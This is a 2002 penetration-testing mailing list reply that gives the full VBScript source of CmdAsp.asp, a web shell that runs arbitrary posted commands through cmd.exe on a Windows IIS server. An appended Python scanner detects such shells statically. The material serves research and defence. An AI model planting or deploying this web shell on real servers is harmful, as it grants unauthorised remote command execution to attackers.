Penetration Testing mailing list archives

Re: ASP Files


From: Javier Fernández-Sanguino Peña <jfernandez () germinus com>
Date: Tue, 10 Dec 2002 19:14:49 +0100

Ian Lyte wrote:

Hi All,

   I'm looking for some sample .asp / .php files (preferably some captured
from honeypots if at all possible) that are currently being uploaded on
compromised systems.

Well, this one was not captured from a honeypot, it's based on one published over there (in this same list and many other places) with some minor changes by me. I guess the original one is
http://www.securiteam.com/tools/CmdAsp_asp_checks_your_last_line_of_defense.html

Regards

Javi

PS: Try Google to find more references to this one.

<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
'  File:    CmdAsp.asp
'  Author:  Maceo <maceo @ dogmile.com>
'  Release: 2000-12-01
'  OS:      Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet=Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & ">" & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<%= "Ejecución de comando: " & szCMD %>
<%= "Fichero creado: " & szTempFile %>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" sizeE value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
'Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
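
Added example, not part of the original post or of Maceo's script: a static triage check a defender can run over .asp files in a web root, keyed to the traits of the sample above (a WScript.Shell object whose Run/Exec argument is built from request data). The function name, the verdict labels and the two benign inputs are constructed for this illustration.

```python
import re

# Traits of the CmdAsp.asp sample above: a WScript.Shell object plus request
# data that reaches its Run/Exec call through a variable.
SHELL_OBJ = re.compile(r'CreateObject\s*\(\s*"WSCRIPT\.SHELL"', re.I)
REQ_SRC = r'Request(?:\.(?:Form|QueryString|Cookies))?\s*\('
REQ_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*' + REQ_SRC, re.I | re.M)
EXEC_CALL = re.compile(r'\.(?:Run|Exec)\b(.*)$', re.I | re.M)
COMMENT_LINE = re.compile(r"^\s*'.*$", re.M)
STRING_LIT = re.compile(r'"[^"]*"')

# Three lines excerpted from the sample in the post.
PAGE_EXCERPT = '''
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
szCMD = Request.Form(".CMD")
Call oScript.Run ("cmd.exe /c " & szCMD & ">" & szTempFile, 0, True)
'''
# Constructed: an ordinary form handler, and a script running a fixed command.
BENIGN = '''
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szName = Request.Form("name")
Response.Write Server.HTMLEncode(szName)
'''
FIXED_CMD = '''
Set sh = Server.CreateObject("WScript.Shell")
sh.Run "ping -n 1 127.0.0.1", 0, True
'''


def scan_asp(source):
    """Return (verdict, reasons) for the text of one classic ASP file."""
    code = COMMENT_LINE.sub("", source)  # drop commented-out VBScript lines
    reasons = []
    if SHELL_OBJ.search(code):
        reasons.append("creates WScript.Shell")
    tainted = {m.group(1).lower() for m in REQ_ASSIGN.finditer(code)}
    for call in EXEC_CALL.finditer(code):
        args = STRING_LIT.sub("", call.group(1))  # keep identifiers only
        names = {w.lower() for w in re.findall(r"\w+", args)}
        if names & tainted or re.search(REQ_SRC, args, re.I):
            reasons.append("request data reaches Run/Exec")
            break
    if len(reasons) == 2:
        return "webshell-likely", reasons
    return ("review" if reasons else "clean"), reasons


if __name__ == "__main__":
    for name in ("PAGE_EXCERPT", "BENIGN", "FIXED_CMD"):
        print(name, scan_asp(globals()[name]))
```

A "review" verdict covers scripts that create the shell object but run only fixed commands. Plain string matching like this misses obfuscated or encoded samples, so a "clean" verdict means no signal, not proof.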
